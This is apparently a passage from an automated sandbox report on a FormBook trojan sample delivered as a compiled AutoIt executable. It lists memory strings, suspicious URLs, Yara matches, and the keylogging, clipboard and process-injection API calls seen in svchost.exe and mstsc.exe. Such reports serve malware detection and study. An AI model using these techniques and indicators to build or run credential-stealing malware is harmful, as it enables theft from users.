            Source: mstsc.exe, 00000003.00000002.3546768186.00000000005B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: mstsc.exe, 00000003.00000002.3546768186.00000000005B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: mstsc.exe, 00000003.00000002.3546768186.00000000005B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: mstsc.exe, 00000003.00000002.3546768186.000000000059C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: mstsc.exe, 00000003.00000003.1991950984.0000000007622000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: mstsc.exe, 00000003.00000002.3548096253.0000000005D46000.00000004.10000000.00040000.00000000.sdmp, FrywuFHvnDbLo.exe, 00000005.00000002.3547618180.0000000004036000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://secure.sahibinden.com/login?return_url=http%3A%2F%2Fwww.mfgarage.net%2F3lu7%2F%3FPR_xXrA%3Dn
            Source: mstsc.exe, 00000003.00000002.3548096253.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, mstsc.exe, 00000003.00000002.3549606840.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, FrywuFHvnDbLo.exe, 00000005.00000002.3547618180.00000000033A6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://whois.gandi.net/en/results?search=ultraleap.net
            Source: mstsc.exe, 00000003.00000002.3549693164.000000000764D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: mstsc.exe, 00000003.00000002.3548096253.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, mstsc.exe, 00000003.00000002.3549606840.00000000073A0000.00000004.00000800.00020000.00000000.sdmp, FrywuFHvnDbLo.exe, 00000005.00000002.3547618180.00000000033A6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.gandi.net/en/domain
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007E407C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_007E407C
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007E427A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_007E427A
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007E407C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_007E407C
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007D003A GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_007D003A
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007FCB26 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_007FCB26

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.2490000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.2490000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.1812489277.0000000002490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3548998319.0000000005260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1817351860.0000000003250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3547541019.00000000041B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1817399152.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3546547268.0000000000160000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3547479377.00000000029B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.3547465093.00000000055B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 1.2.svchost.exe.2490000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 1.2.svchost.exe.2490000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1812489277.0000000002490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3548998319.0000000005260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1817351860.0000000003250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.3547541019.00000000041B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1817399152.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.3546547268.0000000000160000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.3547479377.00000000029B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.3547465093.00000000055B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Binary is likely a compiled AutoIt script file
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: This is a third-party compiled AutoIt script.0_2_00773B4C
            Source: rP0n___87004354.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: rP0n___87004354.exe, 00000000.00000000.1687919642.0000000000824000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_c55106b3-0
            Source: rP0n___87004354.exe, 00000000.00000000.1687919642.0000000000824000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"memstr_6be9a8d1-6
            Source: rP0n___87004354.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_e9c1548a-6
            Source: rP0n___87004354.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"memstr_9388454b-5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024BC553 NtClose,1_2_024BC553
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72B60 NtClose,LdrInitializeThunk,1_2_02F72B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_02F72DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F735C0 NtCreateMutant,LdrInitializeThunk,1_2_02F735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F74340 NtSetContextThread,1_2_02F74340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F74650 NtSuspendThread,1_2_02F74650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72AF0 NtWriteFile,1_2_02F72AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72AD0 NtReadFile,1_2_02F72AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72AB0 NtWaitForSingleObject,1_2_02F72AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72BF0 NtAllocateVirtualMemory,1_2_02F72BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72BE0 NtQueryValueKey,1_2_02F72BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72BA0 NtEnumerateValueKey,1_2_02F72BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72B80 NtQueryInformationFile,1_2_02F72B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72EE0 NtQueueApcThread,1_2_02F72EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72EA0 NtAdjustPrivilegesToken,1_2_02F72EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72E80 NtReadVirtualMemory,1_2_02F72E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72E30 NtWriteVirtualMemory,1_2_02F72E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72FE0 NtCreateFile,1_2_02F72FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72FB0 NtResumeThread,1_2_02F72FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72FA0 NtQuerySection,1_2_02F72FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72F90 NtProtectVirtualMemory,1_2_02F72F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72F60 NtCreateProcessEx,1_2_02F72F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72F30 NtCreateSection,1_2_02F72F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72CF0 NtOpenProcess,1_2_02F72CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72CC0 NtQueryVirtualMemory,1_2_02F72CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72CA0 NtQueryInformationToken,1_2_02F72CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72C70 NtFreeVirtualMemory,1_2_02F72C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72C60 NtCreateKey,1_2_02F72C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72C00 NtQueryInformationProcess,1_2_02F72C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72DD0 NtDelayExecution,1_2_02F72DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72DB0 NtEnumerateKey,1_2_02F72DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72D30 NtUnmapViewOfSection,1_2_02F72D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72D10 NtMapViewOfSection,1_2_02F72D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72D00 NtSetInformationFile,1_2_02F72D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F73090 NtSetValueKey,1_2_02F73090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F73010 NtOpenDirectoryObject,1_2_02F73010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F739B0 NtGetContextThread,1_2_02F739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F73D70 NtOpenThread,1_2_02F73D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F73D10 NtOpenProcessToken,1_2_02F73D10
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04584650 NtSuspendThread,LdrInitializeThunk,3_2_04584650
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04584340 NtSetContextThread,LdrInitializeThunk,3_2_04584340
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04582C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_04582C70
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04582C60 NtCreateKey,LdrInitializeThunk,3_2_04582C60
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04582CA0 NtQueryInformationToken,LdrInitializeThunk,3_2_04582CA0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04582D10 NtMapViewOfSection,LdrInitializeThunk,3_2_04582D10
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04582D30 NtUnmapViewOfSection,LdrInitializeThunk,3_2_04582D30
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04582DD0 NtDelayExecution,LdrInitializeThunk,3_2_04582DD0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04582DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_04582DF0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04582EE0 NtQueueApcThread,LdrInitializeThunk,3_2_04582EE0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04582E80 NtReadVirtualMemory,LdrInitializeThunk,3_2_04582E80
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04582F30 NtCreateSection,LdrInitializeThunk,3_2_04582F30
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04582FE0 NtCreateFile,LdrInitializeThunk,3_2_04582FE0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04582FB0 NtResumeThread,LdrInitializeThunk,3_2_04582FB0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04582AD0 NtReadFile,LdrInitializeThunk,3_2_04582AD0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04582AF0 NtWriteFile,LdrInitializeThunk,3_2_04582AF0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04582B60 NtClose,LdrInitializeThunk,3_2_04582B60
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04582BF0 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_04582BF0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04582BE0 NtQueryValueKey,LdrInitializeThunk,3_2_04582BE0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04582BA0 NtEnumerateValueKey,LdrInitializeThunk,3_2_04582BA0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045835C0 NtCreateMutant,LdrInitializeThunk,3_2_045835C0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_045839B0 NtGetContextThread,LdrInitializeThunk,3_2_045839B0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04582C00 NtQueryInformationProcess,3_2_04582C00
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04582CC0 NtQueryVirtualMemory,3_2_04582CC0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04582CF0 NtOpenProcess,3_2_04582CF0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04582D00 NtSetInformationFile,3_2_04582D00
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04582DB0 NtEnumerateKey,3_2_04582DB0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04582E30 NtWriteVirtualMemory,3_2_04582E30
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04582EA0 NtAdjustPrivilegesToken,3_2_04582EA0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04582F60 NtCreateProcessEx,3_2_04582F60
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04582F90 NtProtectVirtualMemory,3_2_04582F90
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04582FA0 NtQuerySection,3_2_04582FA0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04582AB0 NtWaitForSingleObject,3_2_04582AB0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04582B80 NtQueryInformationFile,3_2_04582B80
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04583010 NtOpenDirectoryObject,3_2_04583010
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04583090 NtSetValueKey,3_2_04583090
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04583D70 NtOpenThread,3_2_04583D70
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04583D10 NtOpenProcessToken,3_2_04583D10
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_00188EE0 NtCreateFile,3_2_00188EE0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_00189040 NtReadFile,3_2_00189040
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_00189130 NtDeleteFile,3_2_00189130
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_001891D0 NtClose,3_2_001891D0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_00189330 NtAllocateVirtualMemory,3_2_00189330
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007DA279: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_007DA279
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007C8638 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_007C8638
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007D5264 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_007D5264
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_0077E8000_2_0077E800
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_0079DAF50_2_0079DAF5
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_0077E0600_2_0077E060
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007841400_2_00784140
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007923450_2_00792345
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007F04650_2_007F0465
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007A64520_2_007A6452
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007A25AE0_2_007A25AE
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_0079277A0_2_0079277A
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007868410_2_00786841
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007F08E20_2_007F08E2
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007889680_2_00788968
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007D89320_2_007D8932
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007CE9280_2_007CE928
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007A890F0_2_007A890F
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007A69C40_2_007A69C4
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_0079CCA10_2_0079CCA1
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007A6F360_2_007A6F36
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007870FE0_2_007870FE
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007831900_2_00783190
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007712870_2_00771287
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_0079F3590_2_0079F359
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007933070_2_00793307
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007916040_2_00791604
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007856800_2_00785680
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007978130_2_00797813
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007858C00_2_007858C0
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_00791AF80_2_00791AF8
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007A9C350_2_007A9C35
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_0077FE400_2_0077FE40
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007F7E0D0_2_007F7E0D
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_0079BF260_2_0079BF26
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_00791F100_2_00791F10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024A85631_2_024A8563
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024BEB331_2_024BEB33
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024A00231_2_024A0023
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0249E0A31_2_0249E0A3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024931091_2_02493109
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024931101_2_02493110
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024926701_2_02492670
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0249FE031_2_0249FE03
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024A67431_2_024A6743
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0249FDFC1_2_0249FDFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC02C01_2_02FC02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE02741_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030003E61_2_030003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E3F01_2_02F4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFA3521_2_02FFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030001AA1_2_030001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD20001_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF81CC1_2_02FF81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF41A21_2_02FF41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC81581_2_02FC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDA1181_2_02FDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F301001_2_02F30100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5C6E01_2_02F5C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3C7C01_2_02F3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F407701_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F647501_2_02F64750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEE4F61_2_02FEE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030005911_2_03000591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF24461_2_02FF2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE44201_2_02FE4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F405351_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA801_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF6BD71_2_02FF6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFAB401_2_02FFAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E8F01_2_02F6E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F268B81_2_02F268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300A9A61_2_0300A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4A8401_2_02F4A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F428401_2_02F42840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A01_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F569621_2_02F56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFEEDB1_2_02FFEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F52E901_2_02F52E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFCE931_2_02FFCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40E591_2_02F40E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFEE261_2_02FFEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F32FC81_2_02F32FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBEFA01_2_02FBEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB4F401_2_02FB4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F60F301_2_02F60F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE2F301_2_02FE2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F82F281_2_02F82F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F30CF21_2_02F30CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE0CB51_2_02FE0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40C001_2_02F40C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3ADE01_2_02F3ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F58DBF1_2_02F58DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDCD1F1_2_02FDCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4AD001_2_02F4AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5D2F01_2_02F5D2F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE12ED1_2_02FE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5B2C01_2_02F5B2C0
